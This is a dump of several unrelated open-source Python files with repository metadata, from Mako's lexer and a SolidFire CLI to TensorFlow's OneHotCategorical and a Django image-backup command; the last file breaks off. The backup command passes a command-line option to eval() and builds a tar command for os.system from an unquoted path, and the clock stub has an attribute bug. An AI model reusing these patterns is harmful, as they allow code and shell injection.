repo_name
stringlengths 5
100
| ref
stringlengths 12
67
| path
stringlengths 4
244
| copies
stringlengths 1
8
| content
stringlengths 0
1.05M
⌀ |
---|---|---|---|---|
Zero-man/exercism | refs/heads/master | python/clock/clock.py | 1 | class Clock:
def __init__(self, hours, minutes):
self.hours = hours
self.minutes = minutes
def __repr__(self):
return "%02d:%02d" % (self.hour, self.minute)
|
2013Commons/HUE-SHARK | refs/heads/master | build/env/lib/python2.7/site-packages/Mako-0.7.2-py2.7.egg/mako/lexer.py | 19 | # mako/lexer.py
# Copyright (C) 2006-2012 the Mako authors and contributors <see AUTHORS file>
#
# This module is part of Mako and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
"""provides the Lexer class for parsing template strings into parse trees."""
import re, codecs
from mako import parsetree, exceptions, util
from mako.pygen import adjust_whitespace
_regexp_cache = {}
class Lexer(object):
def __init__(self, text, filename=None,
disable_unicode=False,
input_encoding=None, preprocessor=None):
self.text = text
self.filename = filename
self.template = parsetree.TemplateNode(self.filename)
self.matched_lineno = 1
self.matched_charpos = 0
self.lineno = 1
self.match_position = 0
self.tag = []
self.control_line = []
self.ternary_stack = []
self.disable_unicode = disable_unicode
self.encoding = input_encoding
if util.py3k and disable_unicode:
raise exceptions.UnsupportedError(
"Mako for Python 3 does not "
"support disabling Unicode")
if preprocessor is None:
self.preprocessor = []
elif not hasattr(preprocessor, '__iter__'):
self.preprocessor = [preprocessor]
else:
self.preprocessor = preprocessor
@property
def exception_kwargs(self):
return {'source':self.text,
'lineno':self.matched_lineno,
'pos':self.matched_charpos,
'filename':self.filename}
def match(self, regexp, flags=None):
"""compile the given regexp, cache the reg, and call match_reg()."""
try:
reg = _regexp_cache[(regexp, flags)]
except KeyError:
if flags:
reg = re.compile(regexp, flags)
else:
reg = re.compile(regexp)
_regexp_cache[(regexp, flags)] = reg
return self.match_reg(reg)
def match_reg(self, reg):
"""match the given regular expression object to the current text
position.
if a match occurs, update the current text and line position.
"""
mp = self.match_position
match = reg.match(self.text, self.match_position)
if match:
(start, end) = match.span()
if end == start:
self.match_position = end + 1
else:
self.match_position = end
self.matched_lineno = self.lineno
lines = re.findall(r"\n", self.text[mp:self.match_position])
cp = mp - 1
while (cp >= 0 and cp<self.textlength and self.text[cp] != '\n'):
cp -=1
self.matched_charpos = mp - cp
self.lineno += len(lines)
#print "MATCHED:", match.group(0), "LINE START:",
# self.matched_lineno, "LINE END:", self.lineno
#print "MATCH:", regexp, "\n", self.text[mp : mp + 15], \
# (match and "TRUE" or "FALSE")
return match
def parse_until_text(self, *text):
startpos = self.match_position
text_re = r'|'.join(text)
brace_level = 0
while True:
match = self.match(r'#.*\n')
if match:
continue
match = self.match(r'(\"\"\"|\'\'\'|\"|\')((?<!\\)\\\1|.)*?\1',
re.S)
if match:
continue
match = self.match(r'(%s)' % text_re)
if match:
if match.group(1) == '}' and brace_level > 0:
brace_level -= 1
continue
return \
self.text[startpos:\
self.match_position-len(match.group(1))],\
match.group(1)
match = self.match(r"(.*?)(?=\"|\'|#|%s)" % text_re, re.S)
if match:
brace_level += match.group(1).count('{')
brace_level -= match.group(1).count('}')
continue
raise exceptions.SyntaxException(
"Expected: %s" %
','.join(text),
**self.exception_kwargs)
def append_node(self, nodecls, *args, **kwargs):
kwargs.setdefault('source', self.text)
kwargs.setdefault('lineno', self.matched_lineno)
kwargs.setdefault('pos', self.matched_charpos)
kwargs['filename'] = self.filename
node = nodecls(*args, **kwargs)
if len(self.tag):
self.tag[-1].nodes.append(node)
else:
self.template.nodes.append(node)
# build a set of child nodes for the control line
# (used for loop variable detection)
# also build a set of child nodes on ternary control lines
# (used for determining if a pass needs to be auto-inserted
if self.control_line:
control_frame = self.control_line[-1]
control_frame.nodes.append(node)
if not (isinstance(node, parsetree.ControlLine) and
control_frame.is_ternary(node.keyword)):
if self.ternary_stack and self.ternary_stack[-1]:
self.ternary_stack[-1][-1].nodes.append(node)
if isinstance(node, parsetree.Tag):
if len(self.tag):
node.parent = self.tag[-1]
self.tag.append(node)
elif isinstance(node, parsetree.ControlLine):
if node.isend:
self.control_line.pop()
self.ternary_stack.pop()
elif node.is_primary:
self.control_line.append(node)
self.ternary_stack.append([])
elif self.control_line and \
self.control_line[-1].is_ternary(node.keyword):
self.ternary_stack[-1].append(node)
elif self.control_line and \
not self.control_line[-1].is_ternary(node.keyword):
raise exceptions.SyntaxException(
"Keyword '%s' not a legal ternary for keyword '%s'" %
(node.keyword, self.control_line[-1].keyword),
**self.exception_kwargs)
_coding_re = re.compile(r'#.*coding[:=]\s*([-\w.]+).*\r?\n')
def decode_raw_stream(self, text, decode_raw, known_encoding, filename):
"""given string/unicode or bytes/string, determine encoding
from magic encoding comment, return body as unicode
or raw if decode_raw=False
"""
if isinstance(text, unicode):
m = self._coding_re.match(text)
encoding = m and m.group(1) or known_encoding or 'ascii'
return encoding, text
if text.startswith(codecs.BOM_UTF8):
text = text[len(codecs.BOM_UTF8):]
parsed_encoding = 'utf-8'
m = self._coding_re.match(text.decode('utf-8', 'ignore'))
if m is not None and m.group(1) != 'utf-8':
raise exceptions.CompileException(
"Found utf-8 BOM in file, with conflicting "
"magic encoding comment of '%s'" % m.group(1),
text.decode('utf-8', 'ignore'),
0, 0, filename)
else:
m = self._coding_re.match(text.decode('utf-8', 'ignore'))
if m:
parsed_encoding = m.group(1)
else:
parsed_encoding = known_encoding or 'ascii'
if decode_raw:
try:
text = text.decode(parsed_encoding)
except UnicodeDecodeError, e:
raise exceptions.CompileException(
"Unicode decode operation of encoding '%s' failed" %
parsed_encoding,
text.decode('utf-8', 'ignore'),
0, 0, filename)
return parsed_encoding, text
def parse(self):
self.encoding, self.text = self.decode_raw_stream(self.text,
not self.disable_unicode,
self.encoding,
self.filename,)
for preproc in self.preprocessor:
self.text = preproc(self.text)
# push the match marker past the
# encoding comment.
self.match_reg(self._coding_re)
self.textlength = len(self.text)
while (True):
if self.match_position > self.textlength:
break
if self.match_end():
break
if self.match_expression():
continue
if self.match_control_line():
continue
if self.match_comment():
continue
if self.match_tag_start():
continue
if self.match_tag_end():
continue
if self.match_python_block():
continue
if self.match_text():
continue
if self.match_position > self.textlength:
break
raise exceptions.CompileException("assertion failed")
if len(self.tag):
raise exceptions.SyntaxException("Unclosed tag: <%%%s>" %
self.tag[-1].keyword,
**self.exception_kwargs)
if len(self.control_line):
raise exceptions.SyntaxException(
"Unterminated control keyword: '%s'" %
self.control_line[-1].keyword,
self.text,
self.control_line[-1].lineno,
self.control_line[-1].pos, self.filename)
return self.template
def match_tag_start(self):
match = self.match(r'''
\<% # opening tag
([\w\.\:]+) # keyword
((?:\s+\w+|\s*=\s*|".*?"|'.*?')*) # attrname, = \
# sign, string expression
\s* # more whitespace
(/)?> # closing
''',
re.I | re.S | re.X)
if match:
keyword, attr, isend = match.groups()
self.keyword = keyword
attributes = {}
if attr:
for att in re.findall(
r"\s*(\w+)\s*=\s*(?:'([^']*)'|\"([^\"]*)\")", attr):
key, val1, val2 = att
text = val1 or val2
text = text.replace('\r\n', '\n')
attributes[key] = text
self.append_node(parsetree.Tag, keyword, attributes)
if isend:
self.tag.pop()
else:
if keyword == 'text':
match = self.match(r'(.*?)(?=\</%text>)', re.S)
if not match:
raise exceptions.SyntaxException(
"Unclosed tag: <%%%s>" %
self.tag[-1].keyword,
**self.exception_kwargs)
self.append_node(parsetree.Text, match.group(1))
return self.match_tag_end()
return True
else:
return False
def match_tag_end(self):
match = self.match(r'\</%[\t ]*(.+?)[\t ]*>')
if match:
if not len(self.tag):
raise exceptions.SyntaxException(
"Closing tag without opening tag: </%%%s>" %
match.group(1),
**self.exception_kwargs)
elif self.tag[-1].keyword != match.group(1):
raise exceptions.SyntaxException(
"Closing tag </%%%s> does not match tag: <%%%s>" %
(match.group(1), self.tag[-1].keyword),
**self.exception_kwargs)
self.tag.pop()
return True
else:
return False
def match_end(self):
match = self.match(r'\Z', re.S)
if match:
string = match.group()
if string:
return string
else:
return True
else:
return False
def match_text(self):
match = self.match(r"""
(.*?) # anything, followed by:
(
(?<=\n)(?=[ \t]*(?=%|\#\#)) # an eval or line-based
# comment preceded by a
# consumed newline and whitespace
|
(?=\${) # an expression
|
(?=\#\*) # multiline comment
|
(?=</?[%&]) # a substitution or block or call start or end
# - don't consume
|
(\\\r?\n) # an escaped newline - throw away
|
\Z # end of string
)""", re.X | re.S)
if match:
text = match.group(1)
if text:
self.append_node(parsetree.Text, text)
return True
else:
return False
def match_python_block(self):
match = self.match(r"<%(!)?")
if match:
line, pos = self.matched_lineno, self.matched_charpos
text, end = self.parse_until_text(r'%>')
# the trailing newline helps
# compiler.parse() not complain about indentation
text = adjust_whitespace(text) + "\n"
self.append_node(
parsetree.Code,
text,
match.group(1)=='!', lineno=line, pos=pos)
return True
else:
return False
def match_expression(self):
match = self.match(r"\${")
if match:
line, pos = self.matched_lineno, self.matched_charpos
text, end = self.parse_until_text(r'\|', r'}')
if end == '|':
escapes, end = self.parse_until_text(r'}')
else:
escapes = ""
text = text.replace('\r\n', '\n')
self.append_node(
parsetree.Expression,
text, escapes.strip(),
lineno=line, pos=pos)
return True
else:
return False
def match_control_line(self):
match = self.match(
r"(?<=^)[\t ]*(%(?!%)|##)[\t ]*((?:(?:\\r?\n)|[^\r\n])*)"
r"(?:\r?\n|\Z)", re.M)
if match:
operator = match.group(1)
text = match.group(2)
if operator == '%':
m2 = re.match(r'(end)?(\w+)\s*(.*)', text)
if not m2:
raise exceptions.SyntaxException(
"Invalid control line: '%s'" %
text,
**self.exception_kwargs)
isend, keyword = m2.group(1, 2)
isend = (isend is not None)
if isend:
if not len(self.control_line):
raise exceptions.SyntaxException(
"No starting keyword '%s' for '%s'" %
(keyword, text),
**self.exception_kwargs)
elif self.control_line[-1].keyword != keyword:
raise exceptions.SyntaxException(
"Keyword '%s' doesn't match keyword '%s'" %
(text, self.control_line[-1].keyword),
**self.exception_kwargs)
self.append_node(parsetree.ControlLine, keyword, isend, text)
else:
self.append_node(parsetree.Comment, text)
return True
else:
return False
def match_comment(self):
"""matches the multiline version of a comment"""
match = self.match(r"<%doc>(.*?)</%doc>", re.S)
if match:
self.append_node(parsetree.Comment, match.group(1))
return True
else:
return False
|
solidfire/solidfire-cli | refs/heads/master | element/cli/commands/cmd_sfapi.py | 2 | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright © 2014-2016 NetApp, Inc. All Rights Reserved.
#
# DO NOT EDIT THIS CODE BY HAND! It has been generated with jsvcgen.
#
import click
from element.cli import utils as cli_utils
from element.cli import parser
from element.cli.cli import pass_context
from element import utils
import jsonpickle
import simplejson
from solidfire.models import *
from solidfire.custom.models import *
from uuid import UUID
from element import exceptions
from solidfire import common
from element.cli.cli import SolidFireOption, SolidFireCommand
class ProtectionSchemeVisibility(data_model.DataObject):
"""ProtectionSchemeVisibility
The public visibility of the protection scheme.
"""
enum_values = ("customer", "testOnly", )
def __init__(self, value):
self._value = value
def __str__(self):
return str(self._value)
def get_value(self):
return self._value
class RemoteClusterSnapshotStatus(data_model.DataObject):
"""RemoteClusterSnapshotStatus
Status of the remote snapshot on the target cluster as seen on the source cluster
"""
enum_values = ("Present", "Not Present", "Syncing", "Deleted", "Unknown", )
def __init__(self, value):
self._value = value
def __str__(self):
return str(self._value)
def get_value(self):
return self._value
class ProtectionSchemeCategory(data_model.DataObject):
"""ProtectionSchemeCategory
The category of the protection scheme.
"""
enum_values = ("helix", "erasureCoded", )
def __init__(self, value):
self._value = value
def __str__(self):
return str(self._value)
def get_value(self):
return self._value
class ProtectionScheme(data_model.DataObject):
"""ProtectionScheme
The method of protecting data on the cluster
"""
enum_values = ("singleHelix", "doubleHelix", "tripleHelix", )
def __init__(self, value):
self._value = value
def __str__(self):
return str(self._value)
def get_value(self):
return self._value
class AuthConfigType(data_model.DataObject):
"""AuthConfigType
This type indicates the configuration data which will be accessed or modified by the element auth container.
"""
enum_values = ("mNode", "element", )
def __init__(self, value):
self._value = value
def __str__(self):
return str(self._value)
def get_value(self):
return self._value
class DriveEncryptionCapabilityType(data_model.DataObject):
"""DriveEncryptionCapabilityType
This specifies a drive's encryption capability.
"""
enum_values = ("none", "sed", "fips", )
def __init__(self, value):
self._value = value
def __str__(self):
return str(self._value)
def get_value(self):
return self._value
class FipsDrivesStatusType(data_model.DataObject):
"""FipsDrivesStatusType
This specifies a node's FIPS 140-2 compliance status.
"""
enum_values = ("None", "Partial", "Ready", )
def __init__(self, value):
self._value = value
def __str__(self):
return str(self._value)
def get_value(self):
return self._value
class AuthMethod(data_model.DataObject):
"""AuthMethod
This type qualifies a ClusterAdmin with its authentication method.
"""
enum_values = ("Cluster", "Ldap", "Idp", )
def __init__(self, value):
self._value = value
def __str__(self):
return str(self._value)
def get_value(self):
return self._value
class MaintenanceMode(data_model.DataObject):
"""MaintenanceMode
Which mode a node is in when it is having maintenenace peformed.
"""
enum_values = ("Disabled", "FailedToRecover", "Unexpected", "RecoveringFromMaintenance", "PreparingForMaintenance", "ReadyForMaintenance", )
def __init__(self, value):
self._value = value
def __str__(self):
return str(self._value)
def get_value(self):
return self._value
class ProposedNodeErrorCode(data_model.DataObject):
"""ProposedNodeErrorCode
This specifies error code for a proposed node addition.
"""
enum_values = ("nodesNoCapacity", "nodesTooLarge", "nodesConnectFailed", "nodesQueryFailed", "nodesClusterMember", "nonFipsNodeCapable", "nonFipsDrivesCapable", "nodeTypeUnsupported", "nodeTypesHeterogeneous", "nodeTypeInvalid", )
def __init__(self, value):
self._value = value
def __str__(self):
return str(self._value)
def get_value(self):
return self._value
class VolumeAccess(data_model.DataObject):
"""VolumeAccess
Describes host access for a volume.
"""
enum_values = ("locked", "readOnly", "readWrite", "replicationTarget", "snapMirrorTarget", )
def __init__(self, value):
self._value = value
def __str__(self):
return str(self._value)
def get_value(self):
return self._value
class ProtectionDomainType(data_model.DataObject):
"""ProtectionDomainType
A Protection Domain is a set of one or more components whose simultaneous failure is protected
from causing data unavailability or loss. This specifies one of the types of Protection Domains
recognized by this cluster.
"""
enum_values = ("node", "chassis", "custom", )
def __init__(self, value):
self._value = value
def __str__(self):
return str(self._value)
def get_value(self):
return self._value
@click.group()
@pass_context
def cli(ctx):
"""invoke """
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright © 2014-2016 NetApp, Inc. All Rights Reserved.
#
# DO NOT EDIT THIS CODE BY HAND! It has been generated with jsvcgen.
#
import click
from element.cli import utils as cli_utils
from element.cli import parser
from element.cli.cli import pass_context
from element import utils
import jsonpickle
import simplejson
from solidfire.models import *
from solidfire.custom.models import *
from uuid import UUID
from element import exceptions
from solidfire import common
from element.cli.cli import SolidFireOption, SolidFireCommand
@click.group()
@pass_context
def cli(ctx):
"""invoke """
@cli.command('invoke',
short_help="""This will invoke any API method supported by the SolidFire API for the version and port the connection is using. Returns a nested hashtable of key/value pairs that contain the result of the invoked method. """,
cls=SolidFireCommand)
@click.option('--method',
type=str,
required=True,
prompt=True,
help="""The name of the method to invoke. This is case sensitive. """)
@click.option('--parameters',
type=str,
required=False,
help="""An object, normally a dictionary or hashtable of the key/value pairs, to be passed as the params for the method being invoked. Has the following subparameters: """)
@pass_context
def invoke(ctx,
# Mandatory main parameter
method,
# Optional main parameter
parameters=None):
"""This will invoke any API method supported by the SolidFire API for the version and port the connection is using."""
"""Returns a nested hashtable of key/value pairs that contain the result of the invoked method."""
if ctx.json is True:
ctx.logger.error("This command does not support the -j field. If you really need it, use sfapi invoke.")
exit(1)
cli_utils.establish_connection(ctx)
kwargsDict = None
if (parameters is not None and parameters != ()):
try:
kwargsDict = simplejson.loads(parameters)
except Exception as e:
ctx.logger.error(e.__str__())
exit(1)
ctx.logger.info(""": """"""method = """ + str(method) + ";" + """parameters = """ + str(kwargsDict) + """;""" + "")
try:
_dict = ctx.element.invoke_sfapi(method=method, parameters=kwargsDict)
except common.ApiServerError as e:
ctx.logger.error(e.message)
exit()
except BaseException as e:
ctx.logger.error(e.__str__())
exit()
if ctx.json:
print(simplejson.dumps(simplejson.loads(_dict), indent=4))
return
else:
cli_utils.print_result(_dict, ctx.logger, as_json=ctx.json, as_pickle=ctx.pickle, depth=ctx.depth,
filter_tree=ctx.filter_tree)
|
ZG-Tennis/django-cropduster | refs/heads/master | cropduster/management/commands/backup_images.py | 2 | #Place in cropduster/management/commands/regenerate_thumbs.py.
# Afterwards, the command can be run using:
# manage.py regenerate_thumbs
#
# Search for 'changeme' for lines that should be modified
import sys
import os
import tempfile
from optparse import make_option
from django.core.management.base import BaseCommand, CommandError
from cropduster.models import Image as CropDusterImage,CropDusterField as CDF
from cropduster.utils import create_cropped_image, rescale
import apputils
import Image
class Command(BaseCommand):
args = "app1 [app2...]"
help = "Backs up all images for an app in cropduster."
option_list = BaseCommand.option_list + (
make_option('--only_originals',
action="store_true",
dest='only_origs',
help="Indicates whether or not to include derived thumbnails. If provided, will exclude all derived images. This would make it necessary to run regenerate_thumbs."),
make_option('--query_set',
dest = "query_set",
default = "all()",
help = "Queryset to use. Default uses all(). This option makes it possible to do iterative backups"),
make_option('--backup_file',
dest="backup_file",
default="cropduster.bak.tar",
help = "TarFile location to store backup")
)
def get_queryset(self, model, query_str):
"""
Gets the query set from the provided model based on the user's filters.
@param model: Django Model to query
@type model: Class
@param query_str: Filter query to retrieve objects with
@type query_str: "filter string"
@return: QuerySet for the given model.
@rtype: <iterable of object>
"""
query_str = 'model.objects.' + query_str.lstrip('.')
return eval(query_str, dict(model=model))
def get_derived_paths(self, cd_image):
"""
Gets the derived image paths.
@param cd_image: Cropduster image to use
@type cd_image: CropDusterImage
@return: Set of paths
@rtype: Sizes
"""
sizes = []
for size in cd_image.size_set.size_set.all():
path = cd_image.thumbnail_path(size)
if os.path.exists(path):
yield path
def find_image_files(self, apps, query_set, only_originals):
"""
Finds all images specified in apps and builds a list of paths that
need to be stored.
@param apps: Set of app paths to look for images in.
@type apps: ["app[:model[.field]], ...]
@param query_set: Query set of models to backup.
@type query_set: str
@param only_originals: Whether or not to only backup originals.
@type only_originals: bool
"""
# Figures out the models and cropduster fields on them
for model, field_names in apputils.resolve_apps(apps):
# Returns the queryset for each model
query = self.get_queryset(model, query_set)
for obj in query:
for field_name in field_names:
# Sanity check; we really should have a cropduster image here.
cd_image = getattr(obj, field_name)
if not (cd_image and isinstance(cd_image, CropDusterImage)):
continue
# Make sure the image actually exists.
file_name = cd_image.image.path
if not os.path.exists(file_name):
sys.stderr.write('missing: %s\n' % file_name)
continue
yield file_name
if only_originals:
continue
# Get all derived images as well
for path in self.get_derived_paths(cd_image):
yield path
#@PrettyError("Failed to build thumbs: %(error)s")
def handle(self, *apps, **options):
"""
Grabs all images for a given app and stores them in a tar file.
"""
abs_path = os.path.abspath( options['backup_file'] )
if os.path.exists(abs_path):
print "\nBackup file `%s` already exists. If you continue, the file "\
"will be overwritten." % options['backup_file']
ret = raw_input('Continue? [y/N]: ')
if not ret.lower() == 'y':
raise SystemExit('Quitting...')
file_list_path = abs_path + '.files'
print "Finding image files..."
# find all images
with file(file_list_path, 'w') as file_list:
for i, path in enumerate(self.find_image_files(apps,
options['query_set'],
options['only_origs'])):
file_list.write( (path+'\n').encode('utf8') )
print "Found %i images to archive" % (locals().get('i', -1) + 1)
# attempt to tar
print "Tarring...."
ret_code = os.system('tar cvf %s.tmp -T %s' % (abs_path, file_list_path)) >> 8
if ret_code > 0:
raise CommandError("Failed when tarring files! Exit code: %i" % ret_code)
# Success!
os.remove(file_list_path)
os.rename(abs_path+'.tmp', abs_path)
print "Successfully tarred images to %s" % abs_path
|
proxysh/Safejumper-for-Desktop | refs/heads/master | buildlinux/env32/lib/python2.7/site-packages/OpenSSL/__init__.py | 22 | # Copyright (C) AB Strakt
# See LICENSE for details.
"""
pyOpenSSL - A simple wrapper around the OpenSSL library
"""
from OpenSSL import rand, crypto, SSL
from OpenSSL.version import (
__author__, __copyright__, __email__, __license__, __summary__, __title__,
__uri__, __version__,
)
__all__ = [
"SSL", "crypto", "rand",
"__author__", "__copyright__", "__email__", "__license__", "__summary__",
"__title__", "__uri__", "__version__",
]
|
ravindrapanda/tensorflow | refs/heads/master | tensorflow/contrib/distributions/python/ops/onehot_categorical.py | 78 | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""The OneHotCategorical distribution class."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import check_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import nn_ops
from tensorflow.python.ops import random_ops
from tensorflow.python.ops.distributions import distribution
from tensorflow.python.ops.distributions import kullback_leibler
from tensorflow.python.ops.distributions import util as distribution_util
class OneHotCategorical(distribution.Distribution):
"""OneHotCategorical distribution.
The categorical distribution is parameterized by the log-probabilities
of a set of classes. The difference between OneHotCategorical and Categorical
distributions is that OneHotCategorical is a discrete distribution over
one-hot bit vectors whereas Categorical is a discrete distribution over
positive integers. OneHotCategorical is equivalent to Categorical except
Categorical has event_dim=() while OneHotCategorical has event_dim=K, where
K is the number of classes.
This class provides methods to create indexed batches of OneHotCategorical
distributions. If the provided `logits` or `probs` is rank 2 or higher, for
every fixed set of leading dimensions, the last dimension represents one
single OneHotCategorical distribution. When calling distribution
functions (e.g. `dist.prob(x)`), `logits` and `x` are broadcast to the
same shape (if possible). In all cases, the last dimension of `logits,x`
represents single OneHotCategorical distributions.
#### Examples
Creates a 3-class distiribution, with the 2nd class, the most likely to be
drawn from.
```python
p = [0.1, 0.5, 0.4]
dist = OneHotCategorical(probs=p)
```
Creates a 3-class distiribution, with the 2nd class the most likely to be
drawn from, using logits.
```python
logits = [-2, 2, 0]
dist = OneHotCategorical(logits=logits)
```
Creates a 3-class distribution, with the 3rd class is most likely to be drawn.
```python
# counts is a scalar.
p = [0.1, 0.4, 0.5]
dist = OneHotCategorical(probs=p)
dist.prob([0,1,0]) # Shape []
# p will be broadcast to [[0.1, 0.4, 0.5], [0.1, 0.4, 0.5]] to match.
samples = [[0,1,0], [1,0,0]]
dist.prob(samples) # Shape [2]
```
"""
def __init__(
self,
logits=None,
probs=None,
dtype=dtypes.int32,
validate_args=False,
allow_nan_stats=True,
name="OneHotCategorical"):
"""Initialize OneHotCategorical distributions using class log-probabilities.
Args:
logits: An N-D `Tensor`, `N >= 1`, representing the log probabilities of a
set of Categorical distributions. The first `N - 1` dimensions index
into a batch of independent distributions and the last dimension
represents a vector of logits for each class. Only one of `logits` or
`probs` should be passed in.
probs: An N-D `Tensor`, `N >= 1`, representing the probabilities of a set
of Categorical distributions. The first `N - 1` dimensions index into a
batch of independent distributions and the last dimension represents a
vector of probabilities for each class. Only one of `logits` or `probs`
should be passed in.
dtype: The type of the event samples (default: int32).
validate_args: Python `bool`, default `False`. When `True` distribution
parameters are checked for validity despite possibly degrading runtime
performance. When `False` invalid inputs may silently render incorrect
outputs.
allow_nan_stats: Python `bool`, default `True`. When `True`, statistics
(e.g., mean, mode, variance) use the value "`NaN`" to indicate the
result is undefined. When `False`, an exception is raised if one or
more of the statistic's batch members are undefined.
name: Python `str` name prefixed to Ops created by this class.
"""
parameters = locals()
with ops.name_scope(name, values=[logits, probs]):
self._logits, self._probs = distribution_util.get_logits_and_probs(
name=name, logits=logits, probs=probs, validate_args=validate_args,
multidimensional=True)
logits_shape_static = self._logits.get_shape().with_rank_at_least(1)
if logits_shape_static.ndims is not None:
self._batch_rank = ops.convert_to_tensor(
logits_shape_static.ndims - 1,
dtype=dtypes.int32,
name="batch_rank")
else:
with ops.name_scope(name="batch_rank"):
self._batch_rank = array_ops.rank(self._logits) - 1
with ops.name_scope(name="event_size"):
self._event_size = array_ops.shape(self._logits)[-1]
super(OneHotCategorical, self).__init__(
dtype=dtype,
reparameterization_type=distribution.NOT_REPARAMETERIZED,
validate_args=validate_args,
allow_nan_stats=allow_nan_stats,
parameters=parameters,
graph_parents=[self._logits,
self._probs],
name=name)
@property
def event_size(self):
"""Scalar `int32` tensor: the number of classes."""
return self._event_size
@property
def logits(self):
"""Vector of coordinatewise logits."""
return self._logits
@property
def probs(self):
"""Vector of coordinatewise probabilities."""
return self._probs
def _batch_shape_tensor(self):
return array_ops.shape(self.logits)[:-1]
def _batch_shape(self):
return self.logits.get_shape()[:-1]
def _event_shape_tensor(self):
return array_ops.shape(self.logits)[-1:]
def _event_shape(self):
return self.logits.get_shape().with_rank_at_least(1)[-1:]
def _sample_n(self, n, seed=None):
sample_shape = array_ops.concat([[n], array_ops.shape(self.logits)], 0)
logits = self.logits
if logits.get_shape().ndims == 2:
logits_2d = logits
else:
logits_2d = array_ops.reshape(logits, [-1, self.event_size])
samples = random_ops.multinomial(logits_2d, n, seed=seed)
samples = array_ops.transpose(samples)
samples = array_ops.one_hot(samples, self.event_size, dtype=self.dtype)
ret = array_ops.reshape(samples, sample_shape)
return ret
def _log_prob(self, x):
x = self._assert_valid_sample(x)
# broadcast logits or x if need be.
logits = self.logits
if (not x.get_shape().is_fully_defined() or
not logits.get_shape().is_fully_defined() or
x.get_shape() != logits.get_shape()):
logits = array_ops.ones_like(x, dtype=logits.dtype) * logits
x = array_ops.ones_like(logits, dtype=x.dtype) * x
logits_shape = array_ops.shape(math_ops.reduce_sum(logits, -1))
logits_2d = array_ops.reshape(logits, [-1, self.event_size])
x_2d = array_ops.reshape(x, [-1, self.event_size])
ret = -nn_ops.softmax_cross_entropy_with_logits(labels=x_2d,
logits=logits_2d)
# Reshape back to user-supplied batch and sample dims prior to 2D reshape.
ret = array_ops.reshape(ret, logits_shape)
return ret
def _prob(self, x):
return math_ops.exp(self._log_prob(x))
def _entropy(self):
return -math_ops.reduce_sum(
nn_ops.log_softmax(self.logits) * self.probs, axis=-1)
def _mode(self):
ret = math_ops.argmax(self.logits, axis=self._batch_rank)
ret = array_ops.one_hot(ret, self.event_size, dtype=self.dtype)
ret.set_shape(self.logits.get_shape())
return ret
def _covariance(self):
p = self.probs
ret = -math_ops.matmul(p[..., None], p[..., None, :])
return array_ops.matrix_set_diag(ret, self._variance())
def _variance(self):
return self.probs * (1. - self.probs)
def _assert_valid_sample(self, x):
if not self.validate_args:
return x
return control_flow_ops.with_dependencies([
check_ops.assert_non_positive(x),
distribution_util.assert_close(
array_ops.zeros([], dtype=self.dtype),
math_ops.reduce_logsumexp(x, axis=[-1])),
], x)
@kullback_leibler.RegisterKL(OneHotCategorical, OneHotCategorical)
def _kl_categorical_categorical(a, b, name=None):
"""Calculate the batched KL divergence KL(a || b) with a, b OneHotCategorical.
Args:
a: instance of a OneHotCategorical distribution object.
b: instance of a OneHotCategorical distribution object.
name: (optional) Name to use for created operations.
default is "kl_categorical_categorical".
Returns:
Batchwise KL(a || b)
"""
with ops.name_scope(name, "kl_categorical_categorical", values=[
a.logits, b.logits]):
# sum(p ln(p / q))
return math_ops.reduce_sum(
nn_ops.softmax(a.logits) * (nn_ops.log_softmax(a.logits)
- nn_ops.log_softmax(b.logits)),
axis=-1)
|
mvdbeek/tools-artbio | refs/heads/master | helper_scripts/clean_tool_conf_xml.py | 5 | #!/usr/bin/env python
## Example usage: python clean_tool_conf.py -i /galaxy/config/shed_tool_conf.xml -o clean_shed_tool_conf.xml
import xml.etree.ElementTree as ET
from os import path
from argparse import ArgumentParser
def check_child(root, children, tooldir, removed_tools=[]):
"""
For each child in children, check if child is tool. If it does not, check
if child is section. If it is, recurse into section.
If it has a file attribute, check if the path exists, else remove child from root.
"""
for child in children:
if child.tag == "section":
check_child(root=children,
children=child.getchildren(),
tooldir=tooldir,
removed_tools=removed_tools)
elif child.tag == "tool":
if path.exists(path.join(tooldir, child.attrib["file"])):
pass
else:
children.remove(child)
removed_tools.append(child.attrib["file"])
return removed_tools
def _parse_cli_options():
"""
Parse command line options, returning `parse_args` from `ArgumentParser`.
"""
parser = ArgumentParser(usage="usage: python %(prog)s <options>")
parser.add_argument("-i", "--input",
dest="input_xml",
required=True,
help="shed_tool_conf.xml or migrated_tool_conf.xml \
that needs to be cleaned from non-existant entries.")
parser.add_argument("-o", "--output_xml",
required=True,
dest="output_xml",
help="Output file for cleaned xml")
return parser.parse_args()
def __main__():
args = _parse_cli_options()
input_xml = args.input_xml
output_xml = args.output_xml
tree = ET.parse(input_xml)
root = tree.getroot()
tooldir = root.attrib["tool_path"]
children = root.getchildren()
removed_tools = check_child(root, children, tooldir)
print "tool xml not found for the follwing tools, removing entries from output xml:"
for tool in removed_tools:
print tool
with open(output_xml, "w") as output:
output.write(ET.tostring(root))
if __name__ == "__main__":
__main__()
|
joakim-hove/django | refs/heads/master | tests/cache/liberal_backend.py | 446 | from django.core.cache.backends.locmem import LocMemCache
class LiberalKeyValidationMixin(object):
def validate_key(self, key):
pass
class CacheClass(LiberalKeyValidationMixin, LocMemCache):
pass
|
Vignesh2208/Awlsim | refs/heads/master | awlsim/core/instructions/insn_spbin.py | 2 | # -*- coding: utf-8 -*-
#
# AWL simulator - instructions
#
# Copyright 2012-2014 Michael Buesch <m@bues.ch>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
